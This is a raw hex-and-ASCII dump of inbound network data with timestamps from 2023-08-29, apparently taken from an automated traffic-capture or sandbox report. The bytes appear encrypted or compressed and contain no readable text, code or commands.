                                                                                                                  2023-08-29 17:16:41 UTC472INData Raw: 7e 7b 8e bb 25 dd 37 2f 50 ea 2f 7b 6e 0b bb ac 43 6d 3c b8 af 3b 6e 45 30 c4 1b b0 46 e3 07 25 ed 0f 77 bb 4b 3b 54 c7 12 9f 12 00 3d 86 36 b8 74 dd c9 2b d1 d3 b0 70 9e d4 e3 ac af 48 f7 7d e1 9f 8d bb 00 b9 f4 3d e8 b4 14 77 2d 31 53 8e b1 de 4c cd 78 f1 3c 19 1f bf 71 bb 99 18 2e 92 c9 d3 55 96 17 11 e9 00 35 e6 3e 45 79 08 42 65 db 10 f2 af 75 c8 99 cd 8f 12 0d 28 48 76 6e 97 13 91 1f d6 6e f4 6c ef 4d e7 12 79 af b7 b7 b5 c8 96 47 ec cf fe 14 f7 6b 65 09 d6 b4 23 04 03 9f f6 51 2c ce 35 8e 66 7c c4 41 99 33 04 e6 81 14 4d 3c 64 72 0f b3 11 0d a6 42 9e 71 bd a6 8f db de 9d c3 66 cb 0f fc ae 7a e6 7c c0 92 01 59 1a ea b2 38 48 77 3b c7 1e 3d f4 39 47 b9 62 cf fe 5a 03 ed bb 2a 92 68 00 58 f5 01 d3 33 5f ec 09 b6 26 fe 98 5c 9f fe d3 ac a3 85 6e c7 04
                                                                                                                  Data Ascii: ~{%7/P/{nCm<;nE0F%wK;T=6t+pH}=w-1SLx<q.U5>EyBeu(HvnnlMyGke#Q,5f|A3M<drBqfz|Y8Hw;=9GbZ*hX3_&\n
                                                                                                                  2023-08-29 17:16:41 UTC476INData Raw: ca b0 94 32 80 43 cc fa cf 0c c7 18 56 fa 20 0a 32 c9 92 b7 69 2b 0d 22 ae a7 c2 2b 81 42 0b c7 52 5a 93 1d ec 84 20 d7 40 f1 fe 80 db 30 f0 d7 28 5b 57 e1 12 9f 94 c5 3f 05 a9 63 60 99 e1 c3 86 35 f3 89 af 12 09 ff a5 f8 5c 33 29 16 69 1c 67 c3 d7 4d 15 79 85 05 e7 f6 77 9a b8 d9 68 c7 ea c3 fa 19 b4 8c 85 b9 96 e9 fc 36 a1 c9 d6 1c e5 9e 26 c3 5c 4d 7e 9a de b9 2d e1 65 48 8f 7a 6e 87 cb 1e b4 ef 5e 67 e2 60 0c 1f 94 d3 be 34 5f 38 62 4f 22 60 f5 04 ef 34 c3 de 6b fb 22 a7 91 82 75 7c 76 64 af db 4d b7 8c 78 16 50 54 fc ee 81 96 47 37 93 7a 80 a4 74 0b 9e c5 09 c7 43 9a 7f 5d 2a 8d f1 39 a8 e2 b8 54 7d 2d a9 b2 c4 61 41 ea 6e 07 fa b6 41 fc 95 55 f5 2e b6 9c 22 a5 a8 af 68 01 e7 d6 07 3a 9b e3 27 fa 7d af a0 f6 3c 3b f7 f8 74 54 09 29 b2 6d ad de 56 5d
                                                                                                                  Data Ascii: 2CV 2i+"+BRZ @0([W?c`5\3)igMywh6&\M~-eHzn^g`4_8bO"`4k"u|vdMxPTG7ztC]*9T}-aAnAU."h:'}<;tT)mV]
                                                                                                                  2023-08-29 17:16:41 UTC480INData Raw: bf 90 59 c5 49 cb bb 2e 44 15 e4 9f db 4f 66 e6 e1 a2 42 aa 8a 2b c5 24 4c 8d 32 1b 97 0d 66 1d df 00 1c e0 8b ea 9a 31 6e 93 b6 6d c3 6b 2f 66 73 2d c2 ca 8e 48 30 45 71 2e 9d 32 ec 99 f6 02 b7 32 d6 b7 1a 2f 4c 1e 20 1a 91 76 2d fe 1c ef 6a a2 a2 e2 7d b0 50 ce a5 35 e4 d7 91 c5 5f f5 75 05 26 6c 87 30 ca cd 03 d7 bb 3d 7d aa 97 e3 e8 b4 1d b7 16 be 98 85 da 08 a4 fd 3b d9 37 d9 53 59 98 c5 a7 d7 02 12 72 5c 22 28 10 93 4b 81 b7 81 22 41 31 23 62 f0 82 38 da af 65 c8 9f 13 f9 32 82 ed 3f 5d e0 74 18 32 30 2f e0 3d 04 3c 83 27 56 73 93 36 3c ae b7 1b 8e 83 5f 44 5c 2f 28 25 21 60 a6 23 f4 b3 e9 4d f1 fd 4c 4b 8e 58 54 3e 15 dc f3 47 a6 a9 a2 5f 3c 94 ca 71 e8 52 1d 8d a4 50 59 51 a1 5f 98 9d 8d e0 80 e5 f7 72 ee 36 6b ad ab aa b1 4b 65 d4 4d bd 38 85 f5
                                                                                                                  Data Ascii: YI.DOfB+$L2f1nmk/fs-H0Eq.22/L v-j}P5_u&l0=};7SYr\"(K"A1#b8e2?]t20/=<'Vs6<_D\/(%!`#MLKXT>G_<qRPYQ_r6kKeM8
                                                                                                                  2023-08-29 17:16:41 UTC484INData Raw: 89 4a 8c 6d db e3 2e 38 c1 fe 4c fe 71 58 f1 90 06 7c 93 43 f9 02 39 e0 e0 9f f4 91 fa 1a d1 d5 96 48 63 96 c1 0f 69 2d 09 72 91 36 4d 7b 9c eb 87 f6 e9 27 3f 3d 50 f8 f4 f6 99 35 06 38 64 29 05 87 56 e6 c8 2a d2 9d f3 53 4d 6b cc c6 44 a0 5a 3c bd 83 b8 f5 67 09 69 73 88 1a 48 b6 4e 4c f6 f3 59 14 43 cd ce 03 73 f0 b8 f5 3a d0 a8 0a ed d5 da 5d 3a 96 b4 de 0c 3a 29 46 76 b8 00 e5 22 5e 7f 7a cf 2a 87 49 9c af 67 c8 75 e5 4b 07 38 e0 4b 3d 6b 95 03 bd 23 5d e4 c6 58 80 46 ca cf f1 d7 cf 5a 21 48 0a 9c 41 f4 15 36 80 4d 0e e9 cb 2c 8b 59 9a d6 ec 05 99 68 91 54 40 b7 60 98 2e 0e 9d 68 98 e7 30 4f c3 5d a3 8d 3e 86 00 c4 7e 79 88 61 73 00 d3 2e 74 53 0c 4b 06 b8 21 51 3c 26 18 ab 1a 47 9e 58 14 a4 d4 86 92 f8 2d 02 7d fc 75 cd de 41 2b ef 37 86 f3 d6 3b df
                                                                                                                  Data Ascii: Jm.8LqX|C9Hci-r6M{'?=P58d)V*SMkDZ<gisHNLYCs:]::)Fv"^z*IguK8K=k#]XFZ!HA6M,YhT@`.h0O]>~yas.tSK!Q<&GX-}uA+7;
                                                                                                                  2023-08-29 17:16:41 UTC488INData Raw: b1 93 87 68 c1 90 66 08 10 d1 fe 42 a7 70 e5 56 33 ad 16 76 5d 57 f0 ae be 18 a3 21 9d f2 e7 59 2b 4d f3 2e 9a d3 bc 75 df 55 59 c5 40 0b 98 a1 94 05 8c 52 33 67 20 2f ec 78 ea ba 44 07 ce d9 cc 4c cd 9e e7 ff a8 e8 9b 57 d1 35 28 23 34 b0 eb 32 ae 95 fb bb 17 a6 4b eb 24 7a 48 77 33 0d 59 e8 56 ff 84 7b 67 6e ee 36 5a 75 56 a0 0b ad e6 e8 33 b6 d3 fe 18 21 22 da 19 0d 82 4f 1b 58 bd 53 89 1e 79 f3 a3 b5 60 ea a3 84 55 b0 d9 8d 59 e1 cd f8 0b 92 11 f3 c0 5b 13 a7 75 72 58 ad 54 9d 64 d6 15 21 7c 59 2a 57 88 44 e6 59 90 a9 82 6a 2a 14 d9 88 b4 81 1e 04 72 88 39 e1 bb 64 e2 f9 23 be 5c 27 90 74 f0 52 4e 23 6b 93 40 74 98 f8 e6 42 a2 34 29 66 8f a9 19 c0 d0 7f f3 e5 8c de 03 52 6a 71 18 a6 ae 8d 29 20 f4 16 62 75 55 1e 67 d0 8e 23 61 a6 44 db b2 51 7b 4f e6
                                                                                                                  Data Ascii: hfBpV3v]W!Y+M.uUY@R3g /xDLW5(#42K$zHw3YV{gn6ZuV3!"OXSy`UY[urXTd!|Y*WDYj*r9d#\'tRN#k@tB4)fRjq) buUg#aDQ{O
                                                                                                                  2023-08-29 17:16:41 UTC492INData Raw: 93 8b 92 34 05 ce 9c 1a 91 ac b8 77 91 93 01 c7 f4 c5 82 60 a1 de 5e f4 2c 17 32 2e 2e e3 68 b2 ed d2 3c cb 3c 7d f3 0f a3 ce 1b 14 91 75 81 27 54 61 01 be a8 da 05 b9 0d df da f4 49 8f 0e c3 95 93 de 1f ed 27 56 49 9c a8 88 37 8a ce a5 c8 a8 d6 ea c9 0f 04 01 e3 12 c1 0f 5c 89 72 fc f4 80 a6 c7 d7 7f 19 2a 02 ed 09 f7 fe d5 77 fd 1e 88 ce e9 b0 88 c1 06 7c 56 7e 01 e9 90 d7 27 62 4f 8c df f4 7a d5 fe 91 1e 6c e7 bc ed af ec 07 91 02 bf ab 1b ce e9 5b e3 34 74 fb 2e 81 01 29 b4 ae cc 3a f7 79 15 f4 b8 33 59 43 e1 b6 68 2a ed 5a 6f 28 62 01 5d da f3 e6 1d b5 3c 3c 62 80 1d ad f8 4c ed 1c 83 fa 4c 8b de f2 76 ce 88 37 dd 68 19 9c 65 4f 01 a3 91 e3 10 d6 59 5d 6b f4 15 62 4c 1b f9 6b 0e 3a ed 84 2a 8d f4 58 c1 46 dd ce 91 c0 71 47 fa af c5 61 01 91 20 1c a2
                                                                                                                  Data Ascii: 4w`^,2..h<<}u'TaI'VI7\r*w|V~'bOzl[4t.):y3YCh*Zo(b]<<bLLv7heOY]kbLk:*XFqGa
                                                                                                                  2023-08-29 17:16:41 UTC496INData Raw: e4 69 c2 fb ae 07 90 8b 7b c2 04 85 f9 65 da c3 5d a4 fb 6b c1 23 5a 82 17 ad 84 a6 a5 9f 88 e6 8e db a8 5c 43 7c b8 a6 55 53 d2 39 65 f1 75 3a 85 0f 18 3c df ad 49 1a a2 f7 62 28 e1 12 a4 44 8a 45 dc ec da ed 4f 8c 01 34 2c d1 fb 86 dc 95 57 5a a1 f9 26 d2 f2 88 8b d8 09 28 c6 56 2a f2 ae 47 50 ad 30 9c 6a d8 4c 4d 90 ee 38 62 f7 b9 c4 e7 c8 01 e5 90 cb fb ff 2b 61 5e 70 21 fc c9 4d ee f6 29 bf ad 44 19 d3 80 07 0c 87 4e 7c 1d 03 9c 76 55 08 8c a4 44 dc d7 b6 10 d9 3d be 4a 23 6c d2 99 31 b0 77 99 65 53 ef 6b d7 64 f0 81 a8 9e cd 9b e3 32 2a 74 79 62 4a e7 1b a2 ed 00 4c 8e b2 50 ca 58 1f 42 a7 35 16 5b 69 e2 2e 06 7b c1 ed b6 2e a5 10 53 b5 9c b9 ec 3f ef 59 00 d0 40 35 46 ae 3f a2 73 47 5f 29 e1 85 25 b0 a9 a7 b3 d9 d7 d8 7f 91 ff 4f 34 ab d2 1e 44 1d
                                                                                                                  Data Ascii: i{e]k#Z\C|US9eu:<Ib(DEO4,WZ&(V*GP0jLM8b+a^p!M)DN|vUD=J#l1weSkd2*tybJLPXB5[i.{.S?Y@5F?sG_)%O4D
                                                                                                                  2023-08-29 17:16:41 UTC500INData Raw: 9b cb a2 b4 99 c6 0b 63 8e fe 5c 32 7e 5f 11 44 86 ac c0 c7 26 b1 3a 82 69 3f 08 cc 98 fc 5d e3 84 72 70 54 db fd 2f 9e 25 cf 84 95 d0 2c cc 66 72 06 26 5c d0 51 3d aa 42 c8 f5 2d 8d ed ff 38 63 dd c1 9b 5b a4 33 88 e2 95 8f b1 62 29 f3 27 cc 16 ee ff 07 e0 83 b7 ce bc b9 16 27 ef bb d0 36 4b b8 46 78 ff 17 d5 82 17 d4 04 83 5d 08 a2 3d 2c 02 71 cd 0b e6 27 e3 d2 3b 7b d9 41 99 20 ab ad 74 15 c7 25 61 c3 c2 ff de 04 38 44 e1 a8 5c f2 7d 33 54 1c 45 45 bc c2 10 06 32 da 48 c4 4b d1 ec 1c ab b0 7d 80 df 2d 86 a0 47 e1 e6 0e 0a d2 af 83 3a 7c fc c7 74 0f 55 0d e3 df 74 6f 38 76 94 80 83 62 51 6e 22 b5 59 9a 1b 7d 13 6b 85 c2 45 c2 40 b9 a8 8c 3e ec 09 87 3b 49 d2 ba 3d 7a c8 8c d8 c0 53 ef 84 0d be 9c 56 7b 53 9e 8c 4d 51 3c 17 c7 15 ab 31 06 ec 8a 29 69 79
                                                                                                                  Data Ascii: c\2~_D&:i?]rpT/%,fr&\Q=B-8c[3b)''6KFx]=,q';{A t%a8D\}3TEE2HK}-G:|tUto8vbQn"Y}kE@>;I=zSV{SMQ<1)iy
                                                                                                                  2023-08-29 17:16:41 UTC504INData Raw: 23 6c 97 49 ff 86 7f d5 51 6d fa 6b a1 44 7f 4a b8 fd 08 9b e8 33 6f a4 3a 81 5a 84 dd c7 2d 44 4d cf f2 ee 4b a9 56 74 64 79 7d 56 a7 be e7 01 7f 1c 85 a6 14 44 54 0b b4 5d 6e 33 60 26 01 0a f8 a4 3d d9 ad f7 40 63 e1 d0 48 2c 4e 45 68 e2 99 3a 1e bc 92 3c 13 45 4f ca 6a c7 d3 44 59 1b 73 b9 fc 29 2c 51 a4 2f 44 41 cb 15 24 33 79 8f a9 1f 28 14 05 b3 34 ad c6 df ec 29 a7 13 b7 b7 0b 63 09 29 c6 9c 6d 27 0d 89 7b 4c 72 14 72 79 57 5c 9b e9 c0 73 5a be 0a d0 c0 4d d1 ae d6 7c 17 9e 64 79 17 a4 37 0c 5f 24 7f c4 b8 5f 04 19 1a 53 93 68 8b 56 06 b8 14 93 c0 d8 a8 8c 6a 19 11 97 b5 52 70 12 05 03 8a 7b 59 00 36 08 08 d9 eb 1f 01 a9 16 8d f6 80 38 3e cf 1e 88 f4 ef b4 76 b5 64 99 d5 51 35 69 85 0d f2 d0 71 96 40 9b a0 b9 c3 93 69 cd d8 bd 0d 07 72 ae 77 86 d1
                                                                                                                  Data Ascii: #lIQmkDJ3o:Z-DMKVtdy}VDT]n3`&=@cH,NEh:<EOjDYs),Q/DA$3y(4)c)m'{LrryW\sZM|dy7_$_ShVjRp{Y68>vdQ5iq@irw
                                                                                                                  2023-08-29 17:16:41 UTC508INData Raw: 9c db 01 b1 c3 09 23 66 b3 64 74 f4 61 c9 f3 3c 1d 7b 6e 63 ed 66 03 65 ae 9e 81 e3 e2 cf 71 84 30 03 0b 4c e1 08 0c f4 ed bb d8 af 4f 04 c2 52 ed 37 75 41 be 21 0c 5f d2 ce e6 37 d3 88 68 bf bb 15 01 1e fe 77 33 c9 dc d8 fa f4 b5 71 c6 82 49 e1 94 9a ed d4 31 cb f8 2e e3 ac d1 ce 59 3b b3 12 0e 1c b1 aa 01 ea be 1f 38 36 16 d2 59 f4 58 a8 79 2f 27 06 12 bf ed f0 62 d4 42 48 e8 d8 76 ce e1 28 31 89 27 aa 68 a4 01 ec 8d 31 76 cc 2d b2 61 f4 fb b5 43 7d 03 6b 79 bb ed 76 1a c9 b5 2e af f7 24 ce 7a bc d0 36 7c 8f fc d0 01 d7 d3 d6 92 65 f4 be 51 f4 00 c4 39 54 44 1d 47 33 ed 17 03 0f d4 0d 2c 9f ba ce 85 c4 f3 c3 79 63 f0 84 01 3b f1 fb bd 3d c2 10 53 f4 6d 00 50 c8 4b 1b 8e 4a e5 e1 1a 24 19 ff 40 a1 0c 95 01 70 76 59 47 f0 ec eb b9 f6 34 be 24 af 03 a0 47
                                                                                                                  Data Ascii: #fdta<{ncfeq0LOR7uA!_7hw3qI1.Y;86YXy/'bBHv(1'h1v-aC}kyv.$z6|eQ9TDG3,yc;=SmPKJ$@pvYG4$G
                                                                                                                  2023-08-29 17:16:41 UTC512INData Raw: 77 94 5c 0f 5c 74 69 aa e8 6b 9f 7e ca ad fe 77 20 e6 e0 bd 5f 29 61 b7 49 6a b5 68 4d 20 bf ef 39 d1 4c 3a 35 ab 92 c5 8a 4e 47 90 13 60 89 ee a1 87 d4 bf 19 08 be 50 d5 d6 01 4a 20 74 97 c1 ff 2f 6f c0 46 92 d4 a4 ff 8b f9 36 b0 9e cd 9b e3 32 47 bf f2 63 4b 22 52 ae fa 8a 04 09 7c 99 47 16 20 42 a5 79 e3 17 e9 21 ef 06 7b c1 44 a6 ff b0 ef 7d 7a ca 76 8a 40 25 51 35 ee 63 db 7f 20 7f 43 23 c2 d6 9d 19 f0 62 0f 6f 50 f3 d0 77 1b d3 13 32 6f 88 a3 c2 df cd 93 da 91 ff fc 30 2c d9 ac 2f 44 85 c9 15 24 bc 07 39 84 d9 9d 54 b9 c1 e1 04 17 71 e5 ac af 13 5a 98 24 75 06 4f cf fc a1 e9 51 4f 33 6f b5 f7 a4 d9 57 dc 51 3e ad 2a 5e b8 41 19 09 87 99 98 68 75 1f a0 e1 97 a4 24 5d 48 0f ed 77 af 71 1a 71 27 cd 8d fc 48 e2 4e c5 d0 ed 63 b7 f8 31 02 aa 32 97 7f 7e
                                                                                                                  Data Ascii: w\\tik~w _)aIjhM 9L:5NG`PJ t/oF62GcK"R|G By!{D}zv@%Q5c C#boPw2o0,/D$9TqZ$uOQO3oWQ>*^Ahu$]Hwqq'HNc12~
                                                                                                                  2023-08-29 17:16:41 UTC516INData Raw: 4e 69 1f 3c 13 ac 2a 07 eb 8f 8c ab fc ad cc 3b ec 7d c8 e9 bd 14 73 5b 1e aa 5c 68 93 6a 94 c3 67 25 e1 ac c9 c6 8e 81 f9 8d 60 69 21 c0 fd 88 db 6b fb 42 3e 60 91 84 55 c6 4c 8c 60 f1 79 45 83 98 7d 90 df 2b 58 d6 67 6e 23 79 21 5c 4c 88 99 53 05 49 bd 67 87 c3 23 9c 79 53 b9 31 f0 f7 97 ab cc 25 e7 fa 9d 43 96 71 cd 55 96 56 64 3e 3e 49 e8 84 bd 35 4e 07 06 37 d1 93 25 3e c9 42 ee d3 27 cd ba 1b be ea 75 f4 98 95 ef 93 51 34 16 ef 0e 63 76 cb 1e 0c c1 78 35 7b 82 a1 32 5d 7f 2b c0 33 e1 b2 d2 f2 50 0f 13 1c 2f dc e7 61 38 88 f1 f9 ba 36 65 e4 38 6d 87 79 de d3 b2 ee 6c 6f 6e f3 8d 3c f7 fa 3b de da d9 b5 21 6f ae ab 90 08 2a 3e 2c 01 4c 36 f4 19 27 eb c9 db 63 1b 2a 69 1e 83 41 65 80 4f 2d 21 e3 05 de 0f 40 36 32 b2 e0 70 c0 6b c3 15 37 3c 00 79 fd 00
                                                                                                                  Data Ascii: Ni<*;}s[\hjg%`i!kB>`UL`yE}+Xgn#y!\LSIg#yS1%CqUVd>>I5N7%>B'uQ4cvx5{2]+3P/a86e8mylon<;!o*>,L6'c*iAeO-!@62pk7<y
                                                                                                                  2023-08-29 17:16:41 UTC520INData Raw: 97 d7 e1 3e 85 84 35 a2 50 7a d6 0e 43 16 d4 dd 73 0a e5 c7 a8 cb ed 9c 3f 9a 4f 05 e9 9c 06 e9 1e 5d 2c a8 bf 79 af 21 cb 14 a3 37 db cd 79 ee e9 a2 56 34 8c 79 49 03 60 61 61 71 86 d1 68 f3 61 2c 7b c5 9f 2c 37 24 f8 90 ca f0 7a 09 0c b1 c3 0e c7 19 9b 45 89 c4 69 cd ec e3 5e 3d 00 03 5c b7 15 c3 49 84 db 00 b5 08 f6 99 55 da 0a 27 c7 eb 75 ba 1d 62 44 3c 82 4f 6c 1a c6 77 fd e5 a0 ea 92 75 79 68 f0 55 88 32 dc a5 0d 7f 02 12 a8 6e 29 5d b6 08 c5 2f 77 95 ef 57 cc 81 be e3 89 d9 c5 82 ae a3 32 86 5c 81 75 5d 65 f9 6e f9 8b 6d b8 a6 11 7a 88 7e 51 34 54 70 7e 86 af cc 5c 8b 11 92 3f dc fd a9 af 9c 41 9e 7a 7b ca 15 97 b7 82 62 e0 9a a2 6c b6 c5 07 ac 41 31 10 17 a3 12 06 57 bc 17 4a ba 3f ea b2 f6 5b 87 ba ed b3 51 87 c0 62 62 86 11 a1 29 52 9b e3 b9 14
                                                                                                                  Data Ascii: >5PzCs?O],y!7yV4yI`aaqha,{,7$zEi^=\IU'ubD<OlwuyhU2n)]/wW2\u]enmz~Q4Tp~\?Az{blA1WJ?[Qbb)R
                                                                                                                  2023-08-29 17:16:41 UTC524INData Raw: d3 24 76 f2 91 ed 8e 3f 14 2d 1f 58 a6 5c 77 28 e8 61 f1 60 f9 1f 6b a3 07 21 86 b3 1f 31 5d 73 b2 2e 46 6b 42 31 7f fd b1 96 96 5f 47 cc 4b 02 2e 69 1c b6 fc ad 83 4b 7a d0 4d 29 54 1b b2 4e 0d 69 38 e0 42 28 8d c5 06 62 e4 05 95 9e 86 04 1d c5 28 e4 e4 f1 8d 58 17 95 b3 45 97 3c e2 8c 40 db 99 aa a0 d9 e0 18 26 bc ec af 23 93 f8 61 ae 62 29 cd cf df be 37 d0 f6 9d 0e dd 31 7b b6 94 d7 fd 79 54 a5 9e 36 4a a7 c4 23 a6 3d 5d 4b cb b2 0e a2 cd 63 92 35 e8 fe 94 a9 77 6d 81 1f 8c 3d ea d2 16 5d ba 20 b9 74 b2 9f 00 ea b5 5e 89 79 ca 7f eb c0 70 2f 7d 20 47 da f9 b1 1b 0c fa b8 7d e2 83 55 fe 6a b0 78 52 c2 91 ff 8e 31 55 c5 44 9b 4e 5b c4 b0 e8 29 78 30 32 54 3c e3 66 ea 05 b3 1f 79 3c df 4e ec 05 23 c9 78 7b b1 38 ca fa de 54 a0 a8 29 4a 05 c1 be fb 11 c2
                                                                                                                  Data Ascii: $v?-X\w(a`k!1]s.FkB1_GK.iKzM)TNi8B(b(XE<@&#ab)71{yT6J#=]Kc5wm=] t^yp/} G}UjxR1UDN[)x02T<fy<N#x{8T)J
                                                                                                                  2023-08-29 17:16:41 UTC528INData Raw: 96 a2 d0 ca 11 a2 32 aa 9a 11 80 67 fd b8 33 c6 ca 93 d7 fc 51 bf e6 59 b8 5b d9 0e f9 87 22 3e 61 15 79 de 8e 87 8c a1 ad 25 1a cf e5 41 cb 85 51 bc c6 46 c0 13 d5 fa 68 ec f5 44 d6 5e 13 87 bc 12 72 49 f4 59 f8 f1 ad f5 a7 e6 e7 43 47 da fd 95 a3 f0 9d 58 84 91 78 02 1e bf cb 94 fc f7 b6 91 29 fc d6 24 dd 09 00 85 74 81 4b 2c 3f ef b0 1a 8d d8 7a 03 81 81 8a 87 c6 18 93 74 76 10 21 46 e2 7a ee be 7e 13 58 cd c2 f3 35 83 2c 05 b3 4f a1 59 2c 73 e5 29 9d 54 bf 41 92 12 40 d1 9d af 2e f5 b6 4b d6 65 00 af 03 e3 88 af 0d 40 02 5d a9 74 1b 47 c6 b3 d6 77 aa 4b f2 f7 3a 98 3a ed 6e ed f9 7f 9f 1c 76 d9 14 6b 6f dd be 66 44 81 75 5d c7 76 1f 89 83 67 f8 59 ee 85 dc 97 a4 44 90 fa c6 71 18 3c da e5 27 74 ff f2 b5 1e 97 27 a1 0f fb fb b9 e3 bb c3 39 b9 04 77 55
                                                                                                                  Data Ascii: 2g3QY[">ay%AQFhD^rIYCGXx)$tK,?ztv!Fz~X5,OY,s)TA@.Ke@]tGwK::nvkofDu]vgYDq<'t'9wU
                                                                                                                  2023-08-29 17:16:41 UTC532INData Raw: c4 b6 5b d8 e6 d6 84 49 59 01 47 df 7b f2 b1 63 14 39 71 8f 64 42 90 3c a7 c6 c4 22 7b 3d 24 f9 11 f0 b0 28 ba 69 78 e9 d3 32 74 f2 a2 d6 66 b2 91 e5 53 db e5 3d c7 f8 63 22 d1 a3 32 27 e6 22 81 ec c1 3a 54 09 5e f7 25 4d 7e 23 20 31 b7 f9 b1 16 24 fc 77 ee 63 48 39 79 a7 6a b4 2e 80 ac 36 bc 92 6b 74 90 fa 49 91 e0 a2 64 8b d2 7c 47 05 df a4 d6 1c 5f 44 74 89 84 8b 3f 2b c3 02 36 f4 a9 12 3d 90 00 cf 79 94 ba 1c 39 8c ad a2 a9 5a ed ef d3 7d 1d 5f 8b 93 64 a2 88 c7 b0 52 c1 93 4b d4 e6 04 a4 ce 79 4b 74 5d 66 3b 45 99 dd 6f 6c 26 d3 66 bb 3e 7b 96 f2 a1 d6 44 f9 f5 7d bf 3f 6c 7d 91 66 5e 06 2f ba 5b d8 e6 d6 9c 4d 59 01 2a dc 0f be f9 a0 dc ea 13 57 ee 09 d1 51 d8 c9 41 83 05 38 f1 c5 ff fb 25 84 01 51 f7 22 3b a7 cd 82 a6 3f c6 b0 9e 60 66 a6 59 e2 44
                                                                                                                  Data Ascii: [IYG{c9qdB<"{=$(ix2tfS=c"2'":T^%M~# 1$wcH9yj.6ktId|G_Dt?+6=y9Z}_dRKyKt]f;Eol&f>{D}?l}f^/[MY*WQA8%Q";?`fYD
                                                                                                                  2023-08-29 17:16:41 UTC536INData Raw: 25 0d 6e 39 3e 0f bf 5e 51 37 b4 8d 59 40 10 2e 8e 64 60 74 f1 de 7c 13 a8 8d e6 36 ed 40 4e 2b da 74 58 0f 60 93 ed e2 89 d9 c5 ba 6f a3 32 27 e1 be fe aa 88 1c 9e f3 c4 6b ba a6 59 f1 54 12 e2 73 99 3a f2 88 18 d6 bd 39 58 1b 3b 7b 11 c1 33 1b a9 ee d6 cc b6 06 fb b7 1f ae 97 bc 2b 95 79 b4 f4 30 fe fe a5 63 22 f7 12 49 f4 9c 8d 0e b3 15 a7 e6 26 6c b2 53 b6 14 d6 e1 62 88 dc 93 e8 a2 56 34 03 da d2 77 3a fb 56 fd d6 6a eb 9e c2 9a 8b 7e c0 af 41 3b a3 66 8c d8 fe 4e 8f b2 4b 06 3f 32 61 f1 96 1e b5 86 68 b3 9f e2 5b 1b 1c 4b 05 af d2 f5 87 6c 2e 52 f6 9b 43 da 86 88 46 06 2f c5 fc d7 72 10 32 fc 91 60 04 36 9a 66 92 6b 3c 74 71 b7 3e 75 8e 57 cf b2 ec cd 31 5a cb 40 1a 0a f1 c0 44 5e ae 09 10 82 00 51 07 e8 8b 26 d0 ac 28 e3 2a 1a 7d fd 33 26 03 d7 61
                                                                                                                  Data Ascii: %n9>^Q7Y@.d`t|6@N+tX`o2'kYTs:9X;{3+y0c"I&lSbV4w:Vj~A;fNK?2ah[Kl.RCF/r2`6fk<tq>uW1Z@D^Q&(*}3&a
                                                                                                                  2023-08-29 17:16:41 UTC540INData Raw: 90 f6 98 1d 7d ae c9 6d 4b ac bf 1a 65 a3 f4 37 4a a7 ce 62 6e 3d 5d 4b de f8 47 e2 45 3f b6 75 32 33 1f 40 57 25 42 85 04 be 9a 27 09 4e 81 c4 dc a9 ae 1c 7b ba 3a ae 97 f7 99 5f 2e cb d5 55 98 ba e0 56 04 d2 f3 e3 01 b8 0e b2 09 d9 0c 37 d8 4b 77 f2 ea b2 8a 96 d9 1a 0e 48 d6 1c cf 35 28 14 e1 ad 85 aa 6f 68 75 5b 7a b4 94 fa 5d a3 18 d1 b9 6b 42 39 57 fd b1 96 96 e5 cf 00 4e 70 95 b2 00 2e 60 89 33 89 3e f4 50 a3 0f 33 fb 3a 6b 9b df 6a a1 ea 2b 9b 13 2c 6c 69 4c db 42 ff 38 85 a3 21 28 5d a6 c4 9c 54 56 25 a3 3c 58 31 9b d6 5f 4d 22 35 98 d4 e1 41 e5 db ce 65 dc 92 e6 6c 00 50 48 71 65 42 90 fe 15 79 08 6f 0e c9 d3 9c 76 e5 38 f0 5b 42 7b a7 ce b3 42 58 19 c0 5d 39 4b be 60 1f fa b6 78 fe 9c 93 1f ae c7 f9 d1 94 e5 52 2d 76 42 11 7d 41 e6 97 17 d6 f9
                                                                                                                  Data Ascii: }mKe7Jbn=]KGE?u23@W%B'N{:_.UV7KwH5(ohu[z]kB9WNp.`3>P3:kj+,liLB8!(]TV%<X1_M"5AelPHqeByov8[B{BX]9K`xR-vB}A
                                                                                                                  2023-08-29 17:16:41 UTC544INData Raw: 8b 87 8e da 65 cc 3e 98 95 62 13 fb 16 be 37 98 1f 8a 09 02 8e 58 e3 00 b5 58 fe 58 24 d5 35 2c 9f c9 d2 c8 35 9c 70 72 4d bc 1a 51 e3 03 10 ad 32 b8 06 ff b3 e6 3e d4 71 a8 e1 02 94 98 ea 56 53 f7 d9 0a 7b 50 ed 8f c5 b7 ef 7d 3d fe ef c3 c1 ad 82 e2 59 2f 7e 4b 04 96 8b 18 fc 28 2d 6d ef 25 31 e2 35 42 54 0f a5 63 68 ef 41 0a c3 73 1e 44 59 1a 73 f8 d5 09 63 23 9a 51 cd 0f 7d 9a 93 b5 4a 62 08 d6 2b 95 bb f4 f5 45 d6 9b a4 63 f0 9a f9 05 d0 d4 ee 92 6b 15 a7 ae 6c 5e f2 2c 30 31 8b b8 16 21 5d 2e e9 a2 1e 54 b3 96 45 ac 0f 50 29 fc d6 09 ed 8c 5e 9a f7 e1 0b 64 f6 a5 04 3f 35 d8 32 82 c0 3d af 37 c6 51 12 9c 02 30 93 47 e3 70 d8 56 8e a9 a7 3d 09 00 4e 58 1b 48 3e 07 f2 9d e7 b2 41 ef 56 95 7d d0 7d 9c 0f b1 0c 79 e3 3b 93 0f 10 20 c2 65 aa 04 c7 00 8c
                                                                                                                  Data Ascii: e>b7XXX$5,5prMQ2>qVS{P}=Y/~K(-m%15BTchAsDYsc#Q}Jb+Eckl^,01!].TEP)^d?52=7Q0GpV=NXH>AV}}y; e
                                                                                                                  2023-08-29 17:16:41 UTC548INData Raw: 61 a5 2c e0 e1 19 ca 45 84 cd 6f 57 e4 35 85 04 ea 8f 5e 44 f6 91 25 fd ab d0 2d bc f6 2d 57 60 2f de ea b8 c3 db 2c c9 29 36 5e f5 79 ac 74 3d 05 77 17 0e 8f 8a df bd 2f 80 0d 6c 1b 5f 15 c8 ee 61 c2 9e 31 0c 7f c2 aa 34 5a 44 57 6d 81 de 2c f4 f8 ac d2 76 f0 15 49 75 f1 5d fa cc fc 64 dc 12 ed 09 27 c3 ae 87 52 85 24 66 70 aa 79 f9 4d f0 b6 3e fd 6d 78 ec 73 af 23 bd ef b4 01 f6 18 81 3f 60 ef 96 01 f8 61 25 d5 18 3e 56 0f cf a6 ec 87 cf 3b 11 5d 2b 0c d1 b9 a6 09 c0 a8 b1 3a 0a fa ce 02 e8 2b 8d eb 89 8c a3 fc ad 82 d3 7f aa 58 75 15 47 ed ef 45 68 d2 6a 